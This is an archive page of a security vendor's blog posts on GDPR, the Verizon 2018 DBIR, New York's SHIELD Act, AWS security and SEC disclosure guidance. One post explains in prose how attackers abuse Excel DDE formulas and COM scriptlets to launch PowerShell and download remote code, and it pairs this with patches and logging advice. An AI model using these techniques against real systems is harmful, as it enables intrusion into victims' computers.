All posts by Andy Green

Another GDPR Gotcha: HR and Employee Data

Another GDPR Gotcha: HR and Employee Data

Have I mentioned recently that if you’re following the usual data security standards (NIST, CIS Critical Security Controls, PCI DSS, ISO 27001) or common sense infosec principles (PbD), you shouldn’t have to expend much effort to comply with the General Data Protection Regulation (GDPR)? I still stand by this claim.

Sure there are some GDPR requirements, such as the 72-hour breach notification, which will require special technology sauce.

There’s also plenty of fine print that will keep CPOs, CISOs, and outside legal counsels busy for the next few years.

US Professional Service Companies Beware!

One of those fine points is how the GDPR deals with employee records. I’m talking about human resource’s employee files, which can cover, besides all the usual identifiers (name, address and photos), personal details such as health, financial, employee reviews, family contact information, and more.

EU-based companies and US companies that have been doing business in the EU have long had to deal with Europe’s stricter national laws about employee data.

The GDPR holds a surprise for US companies that are not consumer-oriented and thought that the new law’s tighter security and privacy protections didn’t cover them. In fact, they do.

I’m referring particularly to US financial, legal, accounting, engineering, and other companies providing B2B services that are not in the business of collecting consumer data.

Let me just say it: the GDPR considers employee records to be personal data — that’s GDPR-ese for what we in the US call PII.  And companies that have personal data of employees – and who doesn’t – will have to comply with the GDPR even if they don’t have consumer data.

So if a US accounting firm in the EU has a data breach involving the theft of employee records, then it would have to notify the local supervisory authority within the 72-hour window.

There’s another surprise for US companies. Even if they don’t have a physical presence in the EU but still have employees there — say French or Italian workers are telecommuting — then their employee records would also be covered by the GDPR.

Employees Have Data Privacy Rights

And that also means, with some restrictions, that employees gain privacy rights over their data: they can request, just as a consumers do, access to their personnel files, and have the right to correct errors.

There’s even an employee “right to be forgotten”, but only when the data is no longer necessary for the “purposes for which it was collected”. Obviously, employers have a wide claim to employee data so it’s easy to see that most employee file are protected from being deleted on demand.

But no doubt they’ll be instances where the “right to be forgotten” rule makes sense. Perhaps a vice president of marketing makes a request to HR to take a one-month leave of absence to study bird life in Costa Rica, has second thoughts, and then asks HR to delete the initial application based on his GDPR rights.

More importantly, employees also have the right to consent to the processing of their data. This particular right is not nearly as straightforward as it is for consumers.

Since employee privacy rights under the GDPR are far from simple, law firms and attorneys are filling the Intertoobz with articles on this subject, especially on the consent to processing loopholes.

As it happens, I came across one written by Sara Jodka, an attorney for Columbus-based Dickinson Wright, that is mercifully clear and understandable by non-attorney life forms.

The DPIA Surprise

The key point that Jodka makes is that since employers have leverage over employees, it’s hard to for the consent to processing to be “freely given”, which is what the GDPR requires.

Typically, an employee has given consent to processing of her data as part of an employment contact. But since the employee likely had no choice but to sign the contract in order to get the job, the GDPR does not consider this freely given.

So how do employers deal with this?

There is an exception that the GPDR makes: if the employer has “legitimate interests”, then consent is not needed. To prove legitimate interest, the company will have to document why its right to the data outweighs the employee’s privacy rights. Essentially, in the one-sided employer-employee relationship, the employer has the burden of proving it needs the data since consent is not generally required.

Though there are some different legal opinions on  the types of employee data covered by legitimate interests, sensitive data involved with monitoring of employee computer usage, their location, or perhaps event their travel plans will definitely require employers to take an extra step.

They will have to perform a Data Protection Impact Assessment or DPIA.

On the IOS blog, we’ve been writing about DPIAs for quite a while. It’s required for the processing of sensitive data, such as racial, ethnic, or health-related. Employee records that contain this information as well as monitoring data will fall under the DPIA rule, which is spelled out in article 35.

In short: companies using the legitimate interest exception for processing employee records will likely also be conducting data assessments that include analyzing the processing, evaluating the security risks involved, and proposing measures to protect the data.

If you’re finding this a little confusing, you are not alone. However, help is on the way!

I interviewed Sara Jodka earlier this week, and she brilliantly explained the subtleties involved in protecting employee records under the GDPR, and has some great advice for US companies .

Stay tuned. I’m hoping to get the first part of the podcast up next week.

Verizon 2018 DBIR: Phishing, Stolen Passwords, and Other Cheap Tricks

Verizon 2018 DBIR: Phishing, Stolen Passwords, and Other Cheap Tricks

Like the rest of the IT security world last week, I had to stop everything I was doing to delve into the latest Verizon Data Breach Investigations Report. I spent some quality time with the 2018 DBIR (after drinking a few espresso), and I can sum it all up in one short paragraph.

Last year, companies faced financially driven hackers and insiders, who use malware, stolen credentials, or phishing as attack vectors. They get in quickly and then remove payment card information, PII, and other sensitive data. It often takes IT staff months to even discover there’s been a breach.

I just played a trick on you.

The above paragraph was taken word for word from my analysis of the 2016 DBIR. Depressingly, this same analysis applies to the 2018 DBIR and has been pretty spot on for the law few years of Verizon reports.

Swiss Cheese

The point is that hackers have found a very comfortable gig that’s hard to defend against.  According to this year’s DBIR, stolen credential and phishing take up the first and third slots in the report table of top 20 actions in breaches.  (RAM scrapers, by the way, are in the 2nd position and used heavily in POS attacks.)

How big a problem are stolen credentials, user names and passwords, which were previously hacked from other sites?

In a post late last year, Brian Krebs explored the dark market in hot passwords. A hacker can buy a vanilla user name and password combination for around $15. But the price goes up for active accounts of military personnel to $60, and tops out to $150 for active credentials from an online electronics retailers.

Let’s face it, credential are relatively inexpensive, and, as it turns out, they are also plentiful. A study by Google puts the number of credentials available on the black market at almost two billion.

Obviously, this is very bad news. Until we have wider use of multi-factor authentication, hackers can get around perimeter defenses to harvest even more credentials and other personal data and then sell them back to the blackmarket. In other words, there’s an entire dark economy at work to make it all happen.

And if hacker don’t have the cash to buy credentials in bulk, they can use phishing techniques to get through the digital door. There is a small ray of hope about phishing: the DBIR says that 80% of employee never click. Of course, the bad news is that 20% will.

Dr. Zinaida Benenson, our go-to expert on phishing, reported a similar percentage of clickers in her phishing experiments (which we wrote about last year): anywhere between 20% to 50% clicked, depending on how the messages was framed.

It only takes one employee to take the bait for the hackers to get in. You can run your own Probability-101 calculation, as I did here, to discover that with near certainty a good phish mail campaign will succeed in placing a malware payload on a computer.

In short: standard perimeter security defenses protecting against phishing attacks or hackers using stolen or weak credentials begin to resemble a beloved dairy product from a mountainous European country.

Scripty Malware

According to the DBIR, phish mail is the primary way malware enters an organization: their stats say it carries the hackers’ evil software over 90% of the time. Hackers don’t have to waste time finding openings in websites using injection attacks or other techniques: phishing is very effective and easier to pull off.

This year’s DBIR also has some interesting insights (see below) into the format of the malware that eventually lands inside the organization. The hackers are using scriptware — either JavaScript or VBScript —far more than binaries.

Source: Verizon 2018 DBIR

And it makes sense! It’s incredibly simple to write these scripts — this non-technical blogger could even do it — and make them appear as, say, clickable PDF files in the case of JS of VBS, or insert a VBA script directly into a Word or Excel doc that will execute on opening.

You can learn about these malware-free techniques by reading my epic series of posts on this topic.

The attackers can also cleverly leverage the built-in script environments found in Microsoft Office. There’s even a completely no-sweat code-free approach that takes advantage of Microsoft Word’s DDE function used in embedded fields — I wrote about it here.

Typically, this initial payload allows the hackers to get a foot in the door, and it’s evil purpose is to then download more sophisticated software. The malware-free series, by the way, has real-world samples that show how this is done. Feel free to study them.

To quickly summarize: the MS Office scriptware involves launching a PowerShell session and then using the WebClient command to download the next stage of the attack over an HTTP channel.

Needless to say, the malware-free techniques – Office scripts, PowerShell, HTTP —are very hard to detect using standard security monitoring tools. The scripts themselves are heavily obfuscated — see my  PowerShell obfuscation series to understand the full impact — and are regularly tweaked so defenses that rely on scanning for specific keywords or calculating hashes are useless.

The Verizon 2018 DBIR validates what I’m saying. Their stats indicate that 70-90% of malware samples are unique to an organization. Or as they put it:

… basically boil down to “AV is dead.” Except it’s not really. Various forms of AV, from gateway to host, are still alive and quarantining nasty stuff every day. “Signatures alone are dead” is a much more appropriate mantra that reinforces the need for smarter and adaptive approaches to combating today’s highly varied malware.

Towards a Better 2018

If you’ve been paying attention, then not too much of what the Verizon DBIR is saying should come as a shock. However, I do encourage you to read the introductory summary and then skip down to the industry vertical section to get more specifics relevant to your situation — mileage does vary. For example, ransomware is rampant in healthcare, and Remote Access Trojans (RATS) are more prevalent in banking.

And now for my brief sermon on what to do about the DBIR’s bleak statistics.

Perimeter defense are not effective in keeping hackers out. You need them, just as you need locks on windows and doors, but the hackers have found simple and cheap methods to get around these security measures.

To make 2018 a better security year, your first step is to admit that expensive firewalls and scanner infrastructure won’t solve everything — admit it right now, and take a huge weight off your shoulders — and so secondary defenses have to be in place.

This means finding and putting more restrictive access rights on your sensitive data files to limit what the hackers can potentially discover, and then using monitoring techniques that alert your security teams if the attackers access these files.

Want to move beyond perimeter security? Click here to request a free risk assessment today!

SHIELD Act Will Update New York State’s Breach Notification Law

SHIELD Act Will Update New York State’s Breach Notification Law

Those of you who have waded through our posts on US state breach notification laws know that there are few very states with rules that reflect our current tech realities. By this I mean there are only a handful that consider personally identifiable information (PII) to include internet-era identifiers, such as email addresses and passwords. And even fewer that would require a notification to state regulators when a ransomware attack occur.

Access Alone, or Access and Acquire, That is the Question!

Remember the loophole in state breach laws with respect to ransomware?

Just about all state notification laws define a breach to be unauthorized access and acquisition. Since ransomware merely accesses the data — it encrypts it — without copying or exfilitrating, such an attack would not have to be reported under that definition.

I’ve been able to find only three states — though there may more lurking— that consider a breach to be either access or acquisition: New Jersey, Connecticut, and, most recently, North Carolina.

But late last year, New York began making a bid to join this elite club. The NY Attorney General Eric Schneiderman proposed the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act) to “close major gaps in New York’s data security laws, without putting an undue burden on businesses.”

NY’s SHIELD — love that abbreviation — will update the state’s legal definition of a breach to use the “or” word, thereby closing the ransomware gap.

By the way, if you’re wondering whether other federal and international data security laws have ransomware loopholes — they do! — and breach notification legalese brings out your inner attorney, you’ll love our in-depth white paper on this very subject.

Anyway, the AG also proposes to tweak the state’s current PII definition to now encompass user name or email address (along with a password), biometric data, and even HIPAA-style protected health information or PHI.

NYS Senate Bill S6933A: Access to OR acquisition. Go that?

The Data Empire State

Those who love the wonky details can peruse the SHIELD Act here and review all the changes it will make to the current legal language on the books.

SHIELD will also require something new as well: companies will need “reasonable administrative, technical, and physical safeguards for sensitive data”— the standard boilerplate that we see in many federal laws. This is as non-prescriptive as it gets, so for now this mostly serves as a warning to companies to have some minimal security policies and procedures in place.

SHIELD is just a legislative proposal at this point, and has yet to be finalized and passed by the legislature. We still have a long way to go. But once that happens, I expect we’ll get additional guidance on some of the law’s nuances from the state. We’ll keep you posted.

I’d like to point out that the SHIELD Act covers any company that does business in NYS. This means that it does have a GDPR-like extended territorial scope aspect to it — in this case, the law crosses state boundaries. In other words, if a California-based e-commerce company collects data from NYS residents, then they would be covered by SHIELD, and would have to report, for example, an exposure or access of PII to NYS authorities.

Yeah, there’s some legal questions about whether NYS can assert jurisdiction in other states.

One last wonky point: New York State’s other data security law, its Department of Financial Services (NYSDFS) own cyber regulations, covers banks and financial companies. It also has breach notifications rules, which we wrote about here.

In short: New York’s financial companies are covered by the NYSDFS regs; for everyone else, the SHIELD Act will apply.

With all this data security legal innovation, New York is at the forefront among states in protecting data and setting a bar — although initially low — for security practices for anyone doing business in the Empire State.

Varonis Perspective

With the Facebook hearings just about over, it appears that Congress may legislate at a national level, at least in terms of data privacy. There are many proposed breach notification and data protections laws also kicking around Congress. A much-needed national law may be on the horizon as well.

The data security legal winds are changing! Why wait to be taken by surprise at a later date?

You can start preparing by reviewing existing security plans and procedures, paying particular attention to incident or breach response.  In particular, to support NY’s breach rule requiring notification on unauthorized access to PII, you’ll need to be able to classify your file system data, and then alert IT security when specific types of sensitve file data are accessed in an usual way.

Not everyone, ahem, can do this!

You’ll also find that the Varonis site to be an incredibly rich resource for data security wisdom. We have many posts and white papers on existing standards and their controls — PCI DSS, NIST 800 family, SANS Critical Security Controls (CSC) — that will provide ideas and inspiration for meeting New York’s new rules.

And we explain how Varonis can help with our DatAdvantage, DatAlert, and DataPrivilege products.

Need to know more? Click here to request a free risk assessment today!

What Experts Are Saying About GDPR

What Experts Are Saying About GDPR

You did get the the memo that GDPR goes into effect next month?

Good! This new EU regulation has a few nuances and uncertainties that will generate more questions than answers over the coming months. Fortunately, we’ve spoken to many attorneys with deep expertise in GDPR. To help you untangle GDPR, the IOS staff reviewed the old transcripts of our conversations, and pulled out a few nuggets that we think will help you get ready.

Does the GDPR cover US businesses? Is the 72-hour breach notification rule strict? Do you need a DPO?  We have the answers below!  If you have more time, listen to our podcasts for deeper insights.

Privacy By Design Raised the Bar

Inside Out Security: Tell us about GDPR, and its implications on Privacy by Design.

Dr. Ann Cavoukian: For the first time, right now the EU has the General Data Protection Regulation, which passed for the first time, ever. It has the words, the actual words, “Privacy by Design” and “Privacy as the default” in the stature.

What I tell people everywhere that I go to speak is that if you follow the principles of Privacy by Design, which in itself raised the bar dramatically from most legislation, you will virtually be assured of complying with your regulations, whatever jurisdiction you’re in.

Because you’re following the highest level of protection. So that’s another attractive feature about Privacy by Design is it offers such a high level of protection that you’re virtually assured of regulatory compliance, whatever jurisdiction you’re in.

 

Leave a review for our podcast & we'll send you a pack of infosec cards.


US Businesses Also Need To Prepare for GDPR

Inside Out Security: What are some of the concerns you’re hearing from your clients on GDPR?

Sue Foster: When I speak to my U.S. clients, if they’re a non-resident company that promotes goods or services in the EU, including free services like a free app, for example, they’ll be subject to the GDPR. That’s very clear.

Also, if a non-resident company is monitoring the behavior of people who are located in the EU, including tracking and profiling people based on their internet or device usage, or making automated decisions about people based on their personal data, the company is subject to the GDPR.

 

Leave a review for our podcast & we'll send you a pack of infosec cards.


Is the 72-hour rule as strict as it sounds?

Inside Out Security:  What we’re hearing from our customers is that the 72-hour breach rule for reporting is a concern. And our customers are confused and after looking at some of the fine print, we are as well!! So I’m wondering if you could explain the breach reporting in terms of thresholds, what needs to happen before a report is made to the DBA’s and consumers?

Sue Foster: So you have to report the breach to the Data Protection Authority as soon as possible, and where feasible, no later than 72 hours after becoming aware of the breach.

How do I know if a breach is likely to ‘result in a risk to the rights and freedoms of natural persons’?

There is actually a document you can look at to tell you what these rights and freedoms are. But you can think of it basically in common sense terms. Are the person’s privacy rights affected, are their rights and the integrity of their communications affected, or is their property affected?

If you decide that you’re not going to report after you go through this full analysis and the DPA disagrees with you, now you’re running the risk of a fine to 2% of the group’s global turnover …or gross revenue around the world.

But for now, and I think for the foreseeable future, it’s going to be about showing your work, making sure you’ve engaged, and that you’ve documented your engagement, so that if something does go wrong, at least you can show what you did.

 

Leave a review for our podcast & we'll send you a pack of infosec cards.


What To Do When You Discover A Breach

Inside Out Security: What are one the most important things you would do when you discover a breach? I mean if you could prioritize it in any way. How would you advise a customer about how to have a breach response program in a GDPR context?

Sheila FitzPatrick: Yeah. Well first and foremost, you do need to have in place, before a breach even occurs, an incident response team that’s not made up of just the IT. Because normally organizations have an IT focus. You need to have a response team that includes IT, your chief privacy officer. And if the person… normally a CPO would sit in legal. If he doesn’t sit in legally, you want a legal representative in there as well. You need someone from PR, communications that can actually be the public-facing voice for the company. You need to have someone within Finance and Risk Management that sits on there.

So the first thing to do is to make sure you have that group in place that goes into action immediately. Secondly, you need to determine what data has potentially been breached, even if it hasn’t. Because under GDPR, it’s not… previously it’s been if there’s definitely been a breach that can harm an individual. The definition is if it’s likely to affect an individual. That’s totally different than if the individual could be harmed. So you need to determine okay, what data has been breached, and does it impact an individual?

So, as opposed to if company-related information was breached, there’s a different process you go through. Individual employee or customer data has been breached, the individual, is it likely to affect them? So that’s pretty much anything. That’s a very broad definition. If someone gets a hold of their email address, yes, that could affect them. Someone could email them who is not authorized to email them.

So, you have to launch into that investigation right away and then classify the data that has been any intrusion into the data, what that data is classified as.

Is it personal data?

Is it personal sensitive data?

And then rank it based on is it likely to affect an individual?

Is it likely to impact an individual? Is it likely to harm an individual?

So there could be three levels.

Based on that, what kind of notification? So if it’s likely to affect or impact an individual, you would have to let them know. If it’s likely to harm an individual, you absolutely have to let them know and the data protection authorities know.

 

Leave a review for our podcast & we'll send you a pack of infosec cards.


Do we need to hire a DPO?

Inside Out Security: An organization must appoint a data protection officer (“DPO”) if, among other things, “the core activities” of the organization require “regular and systematic monitoring of data subjects on a large scale.”  Many Varonis customers are in the B2B space, where they do not directly market to consumers. Their customer lists are perhaps in the tens of thousands of recipients up to the lower six-figure range. First, does the GDPR apply to personal data collected from individuals in a B2B context? And second, how when does data processing become sufficiency “large scale” to require the appointment of a DPO?

Bret Cohen and Sian Rudgard with Hogan Lovells: Yes, the GDPR applies to personal data collected from individuals in a B2B context (e.g., business contacts).  The GDPR’s DPO requirement, however, is not invoked through the maintenance of customer databases.

The DPO requirement is triggered when the core activities of an organization involve regular and systematic monitoring of data subjects on a large scale, or the core activities consist of large scale processing of special categories of data (which includes data relating to health, sex life or sexual orientation, racial or ethnic origin, political opinions, religious or philosophical beliefs, trade union membership, or biometric or genetic data).

“Monitoring” requires an ongoing tracking of the behaviors, personal characteristics, or movements of individuals, such that the controller can ascertain additional details about those individuals that it would not have known through the discrete collection of information.

Therefore, from what we understand of Varonis’ customers’ activities, it is unlikely that a DPO will be required, although this is another area on which we can expect to see guidance from the DPAs, particularly in the European Member States where having a DPO is an existing requirement (such as Germany).

Whether or not a company is required to appoint a DPO, if the company will be subject to the GDPR, it will still need to be able to comply with the “Accountability” record-keeping requirements of the Regulation and demonstrate how it meets the required standards. This will involve designating a responsible person or team to put in place and maintain appropriate  policies and procedures , including data privacy training programs.

 

Adventures in Malware-Free Hacking, Part V

Adventures in Malware-Free Hacking, Part V

In this series of post, we’ve been exploring attack techniques that involve minimal efforts on the part of hackers. With the lazy code-free approach I introduced last time, it’s even possible to slip in a teeny payload into a DDE field within Microsoft Word. And by opening the document attached to a phish mail, the unwary user lets the attacker gain a foothold on her laptop. To bring the story up to date, Microsoft ultimately closed the door on DDE attacks with a security patch late last year.

The patch adds a registry entry that disables DDE functionality within Word by default. If you still absolutely need this capability, you’re free to update the setting to bring the old DDE capabilities back to the way it was.

However, the original patch only covered Microsoft Word. Are there DDE capabilities in other Microsoft Office products than can be exploited in code-free style?

Yes, indeed. You can also find them in Excel.

Night of the Living DDE

Before you start shouting into your browser, I’m aware that I left you on the edge of your seat in the previous post describing COM scriptlets. I’ll get to them further below.

Let’s continue with the evil side of DDE, the Excel version.

Just as with Word, Excel’s somewhat hidden DDE capabilities allow you to execute a bit of shell code without breaking a sweat. As a long-suffering Word user, I was familiar with fields and knew a little about DDE functions.

In Excel, I was a little surprised to learn I can execute a command shell from within a cell, as demonstrated in the following:

Did you know you can do this? I didn’t.

This ability to run a Windows shell comes to us courtesy of DDE. (And yes there are other apps to which you can connect using Excel’s embedded DDE features.)

Are you thinking what I’m thinking?

Have the cmd shell in the cell launch a PowerShell session that then downloads and executes a remote string — the trick we’ve been using all along. Like I did below:

You can insert a little PowerScript to download and execute remote code within Excel. Stealthy! 

You would, of course, need to explicitly enter the cell to execute this Excel formula.

So how could a hacker force this DDE command to be executed?

When the worksheet is opened, and if not otherwise configured, Excel will try to refresh these DDE links. There have long been options — buried in Trust Center — to either disable or prompt on updating links to external data sources or other workbooks.

Even without the recent patches, you can disable automatic updates of data connections or DDE links. 

Microsoft initially advised companies last year to disable automatic updates to prevent this DDE-based hack from being so easily pulled off in Excel.

These were mitigations, of course, but Microsoft was reluctant to go the same route as they did for Word, which was to provide a registry entry that would disable DDE all together.

But in January, they bit the bullet and provided patches for Excel 2007, 2010, and 2013 that also turn off DDE by default. This article (h/t Computerworld) nicely covers the details of the patch.

Let’s Go to the Event Logs

In short, Microsoft has cut the power on DDE for MS Word and Excel — if you’ve incorporated their patches —  finally deciding that DDE is more like a bug than, clearing throat, a feature.

If you’ve not, for whatever reason, included these patches in your environment, then you can still reduce the risk of a DDE-based attack by disabling automatic updates or enabling the options that prompt users to refresh links when the document or spreadsheets are opened.

And now an important question: if you’re a victim of this style of attack, would the PowerShell sessions launched by, either fields in Word or a shell command in the Excel cell, show up in the log?

Q:Are PowerShell sessions launched through DDE logged? A:Yes.

In my obfuscation series, I discussed how PowerShell logging has been greatly improved in recent versions of Windows. So I took a peek at the log (above), and can confirm that even when you’re launching PowerShell sessions directly from a cell function —rather than as a macro — Windows will log the event.

I’m not saying it would be easy for IT security to connect all the dots between the PowerShell session, an Excel document, and a phish mail and decide that this is indeed the beginning of the attack. I’ll discuss the consequences of malware-free hacking techniques in my final post in this never-ending series.

Enter the COM Scriptlet

In the previous post, I took on the subject of COM scriptlets. On their own, they are, I suppose, a neat feature that allows you to pass around code, say, JScript, as just another COM object.

But then hackers discovered scriptlets, and at a minimum, it allows them to keep a very low profile on a victim’s computer — “living off the land”.  This Derbycon video demos a few resident Windows tools that take remote scriptlets as arguments — regsrv32, rundll32 — and let hackers essentially conduct their attack malware-free. As I showed last time, you can easily launch PowerShell commands using a JScript-based scriptlet.

As it turns out, a very smart security researcher discovered a way to run a COM scriptlet within an Excel document. He found that something called Package is inserted into an Excel cell formula when you try to link to a document or graphic. And Package will accept a remote scriptlet (below).

Yikes, another stealthy code-free technique to launch a shell using COM scriptlets.

After doing low-level code inspection, the researcher learned that this is actually a bug in the Package software. It wasn’t meant to instantiate a COM scriptlet, just file objects.

I’m not sure whether there’s a patch for this yet. In my own exploration in a virtual Amazon WorkSpaces desktop with Office 2010, I was able to reproduce his results. When I tried again the other day, I had no success.

As we finish up this series, I hope I left you with the feeling that there’s a lot of uncertainty in what hackers can do in your environment. Even if you accept all the recent Microsoft Office patches, they still have relatively low-effort techniques, through the VBA macros I initially presented, to embed a malware payload into Word or Excel.

And if you’ve not done your patch homework, you’ve made it even easier for them to gain a foothold with code-free hacking and then perform stealthy post-exploitation.

I’ll talk about what this all means for mounting a reasonable security defense in — I promise — my final post in this saga.

Day Tripping in the Amazon AWS Cloud, Part I: Security Overview

Day Tripping in the Amazon AWS Cloud, Part I: Security Overview

I’ve been an occasional user of “the cloud”, a result of working out some data security ideas and threat scenarios in the Amazon EC2 environment. I played at being a system admin while setting up a domain with a few servers, and configuring Active Directory on a controller. My focus was on having a Windows environment that I could do some pen testing. But there’s more to Amazon Web Services (AWS) than EC2 computing environments, and I decided it’s the right time to started exploring more of its services, especially from a security perspective.

There’s No “There” In the Cloud

It’s natural for many in IT (and corporate bloggers with IT backgrounds) to gravitate to EC2. It’s basically a virtual IT facility: Windows operating systems available on different virtual hardware, a virtual network where you don’t have to deal with cables or routers, virtual firewalls, and other network security features.

However, the cloud is more than just a recreation of the IT server room! They call it Amazon Web Services for a reason: Amazon offers computing and storage services removed from their familiar settings.

Get your AWS Services, AWS Services! Lots of choices from the AWS console.

Need just a cloud file system for sharing and working with documents? There’s Amazon WorkDocs.

What if you just want a Windows desktop environment for your small- or mid-size company without having to deal with all the messy server infrastructure? Amazon WorkSpaces is just for you.

Going a step further, what if you just need enormous amounts of raw storage for web applications, and you don’t really care that it’s not organized as a Windows file system.  For that, there’s Amazon S3 buckets.

Need access to an Active Directory environment? Amazon Directory is just the ticket.

In a way the Amazon cloud — and others have similar offerings — is really a collection of separate OS services that are not tied to a specific facility or location: AWS is, of course, accessible everywhere.

AWS IAM , IAM AWS

The first level of security then is controlling access to these services. For that AWS, has, but what else, an identity and access management system or IAM. It’s called — wait for it— IAM.

When I set up my first AWS account to use EC2, I was given root access and the ability to add new users and groups. You can think of these additional users as power users who can create and modify services in the AWS console. They’re the elite admins of the AWS cloud world.

Users can be organized into groups. And if you’re wondering where the access part of IAM, it’s through something called policies. We wrote a little about these JSON-structured things with respect to S3 buckets.

My IAM crew: adminandy, dangeroudan, sleazysal, and sneakysam.

Just as you can associate a policy with a bucket,  you can do the same with IAM users. I’ll talk about setting policies for AWS console users in the next post, but let’s say that the Amazon policies ain’t very intuitive.

In my scenario, I set up a policy for an IAM group called Restricted, which allows users only read access to the EC2 part of the AWS — in other words, preventing them from launching or stopping Amazon instances. I added two users into the Restricted group: sleazysal and sneakysam.

By the way, there are additional security protections that Amazon provides for AWS users, including multi-factor authentication — currently supporting only special hardware fobs — and separate security credentials that, as we’ll see, can be used to access Amazon services from within computing environment through AWS’s special command line interface or cli.

Next time we’ll learn more about the not very pretty details of policies and something called Amazon resource names or arns, which is the way you refer to just about everything in the Amazon-verse.

Keep in mind that IAM covers users at the level of the AWS console. To set up ordinary users and their permissions, you’ll need to work with plain vanilla directory environments, such as Active Directory, which will examine next time through AWS Directory services.

A completely intuitive access policy for the Restricted user group.

Some Auditing

The AWS console really a portal for admins to launch EC2 instances and other computing environments, set up buckets, create databases, and of course monitor activities.

AWS does support auditing of AWS services and this is done through their CloudTrail service. You can think of it as something like Microsoft’s Event Log, but not nearly as pretty—hard to believe, I know! Further on in this series, we’ll learn about Amazon Athena, which is a tool to help you tame the raw Amazon event logs.

Raw and uncooked: Amazon CloudTrail logs. We’ll use Athena to help organize it.

Bucket Brigade

It’s a good time to look at a service that provides a useful real-world application, S3 buckets. Buckets have obvious use cases in storing huge image files for web applications, but it can store any corporate big-data file.

Or in the scenario I worked out, you can think of buckets as a bare-bones file locker (below).

I’m using buckets to store Word docs that I can share with other IAM users!

However, more appropriate for this type of file sharing activity is the Amazon Workdocs service, which we’ll explore next time.

In any case, with S3 buckets you can configure access control lists for different IAM users. And for more sophisticated permissioning, you can also up more granular policies.

By the way, it’s relatively easy to upload files and other digital objects into the S3 buckets using the Amazon browser interface. There are even third-party apps, one of which I experimented with, that turn this into more of a file locking and sync service.

With some free-ware apps, you can turn S3 buckets into a file sharing service. Btw, you’ll need to borrow a users’ IAM credentials to configure.

What about monitoring and auditing bucket resources?

Amazon does offer a service called Macie, which it describes as “using machine learning to automatically discover, classify, and protect sensitive data in AWS”.

After reviewing Macie, I’d say it’s a data classification service with an alerting function, kind of something like this and this. You could envision, say, some corporate application monthly uploading  huge amounts of transactional data from several different locations into an Amazon S3 bucket. Macie would then monitor the bucket data and let you know who’s accessing it as well as alerting when it finds sensitive PII.

Macie has the ability to let you set regular expressions to discover PII patterns,  and to classify text using static strings — for example, find the word “proprietary” or “confidential” in a document.

I’ll make the point again that Amazon’s built-in tools are not the most informative or easy-to-use. At a minimum, Macie gives you some insights into the Amazon bucket data store.

We’ll see later that it is possible to import S3 bucket objects, using the Amazon command line interface, into a standard Windows environment. And from there, with the right tools, you can do a far better analysis.

Alerts and data classification with Amazon’s Macie.

Let’s take a breath.

We’ve laid out some of the basics of the AWS environment, and looked at a few security and auditing ideas. Next time will take closer look at some of these AWS security tools.

And then we’ll start getting into more of the meat, by examining  practical IT environments — particularly Workspace and Workdocs — and see what Amazon offers in terms of security.

(Spoiler alert: there ain’t much beyond standard Windows functions.)

Till next time!

[White Paper] Let Varonis Be Your EU GDPR Guide

[White Paper] Let Varonis Be Your EU GDPR Guide

Everyone knows that when you travel to a strange new country, you need a guide. Someone to point out the best ways to move around, offer practical tips on local customs, and help you get the most out of your experience.

The EU General Data Protection Regulation (GDPR) is a country with its own quirky rules (and steep fines if you don’t do things just right). So may we suggest using Varonis to help you navigate the data compliance and regulatory landscape of GDPR-istan?

We’ve amassed lots of experience in the last few years, talking to GDPR experts, exploring the GDPR’s legal fine print, and analyzing the latest guidelines from the regulators. But you don’t have to go through the back pages of the IOS blog to find it all.

Instead we’ve conveniently distilled all of our extensive GDPR travel wisdom into our new white paper.

What’s the best route through GDPR? We’ve developed a practical three-step approach. First, we explain how to use Varonis to monitor and identify risks in your file system environment by finding sensitive personal data with overly permissive access policies. Second, we guide you on the preventive actions to protect your data based on the previous analysis by restricting access rights and eliminating stale or unused data. And third, we offer advice on how to sustain and maintain your GDPR compliance through actively detecting security threats and using this feedback to update your IT policies.

Don’t delay! Download our GDPR travel guide today, and bon voyage. 

 

New SEC Guidance on Reporting Data Security Risk

New SEC Guidance on Reporting Data Security Risk

In our recent post on a 2011 SEC cybersecurity guidance, we briefly sketched out what public companies are supposed to be doing in terms of informing investors about risks related to security threats and actual incidents. As it happens, late last month the SEC issued a further guidance on cybersecurity disclosures, which “reinforces and expands” on the older one. Coincidence?

Of course! But it’s a sign of the times that we’re all thinking about how to take into account data security risks in business planning.

Just to refresh memories, the SEC asked public companies to report data security risk and incidents that have a “material impact” for which reasonable investors would want to know about. The reports can be filed annually in a 10-K, quarterly in a 10-Q, or, if need be, in a current report or 8-K.

Nowhere in the SEC laws and relevant regulations do the words data security or security risk show up. Instead “material risks”, “materiality”, and “material information” are heavily sprinkled throughout —  lawyer-speak for business data and events worth letting investors know about.

Looking for Material

It’s probably best to quote directly from the SEC guidance on the subject of materiality:

The materiality of cybersecurity risks or incidents depends upon their nature, extent, and potential magnitude, particularly as they relate to any compromised information or the business and scope of company operations The materiality of cybersecurity risks and incidents also depends on the range of harm that such incidents could cause.  This includes harm to a company’s reputation, financial performance, and customer and vendor relationships, as well as the possibility of litigation or regulatory investigations …

An important point to make about the SEC language above is that it’s not about any one particular thing — report ransomware, or a DoS attack — but rather, as the lawyers say, you have to do fact-based inquiry. If you want to get more of a flavor of this kind of analysis, check out this legal perspective.

However, the SEC does provide some insight into evaluating  reportable security risks. The complete list is in the guidance, but here are a few that would be most relevant to IOS readers: the occurrence of prior cybersecurity incidents, the probability and magnitude of a future incident, the adequacy of preventive actions taken to reduce cybersecurity risk, the potential for reputational harm, and litigation, regulatory, and remediation costs.

What about the types of real-world incidents that would have to be disclosed or reported?

I searched and searched, and I did find an example buried in a footnote — wonks can peruse the amazing footnote 33. It’s probably not a great surprise to learn that investors would be interested in knowing when “compromised information might include personally identifiable information, trade secrets or other confidential business information, the materiality of which may depend on the nature of the company’s business, as well as the scope of the compromised information.”

In short, the SEC guidance is just telling us what we in data security already know: the exposure of sensitive PII, such as social security and credit card numbers, or passwords to bank accounts, or trade secrets regarding, say, a cryptocurrency application, are worthy not only if notifying security staff but investors as well.

Something Noteworthy: Security Policies and Procedures

Sure the typical regulatory verbiage can quickly put you into REM sleep, but occasionally there’s something new and noteworthy buried in the text.

And this latest SEC guidance does have some carefully worded advice regarding cybersecurity procedures and policies. The SEC “encourages” public companies to have them, and to review their compliance. It also asks companies to review their cybersecurity disclosure controls and procedures, and to make sure they are sufficient to notify senior management so they can properly report it.

It’s worth repeating that SEC rules and regulations cover general business risk, not specifically cybersecurity risk. The guidance recommends that companies evaluate this special risk and inform investors when the risks change, and of course let them know about material cybersecurity incidents

Musings on Cybersecurity Disclosures for Public Companies

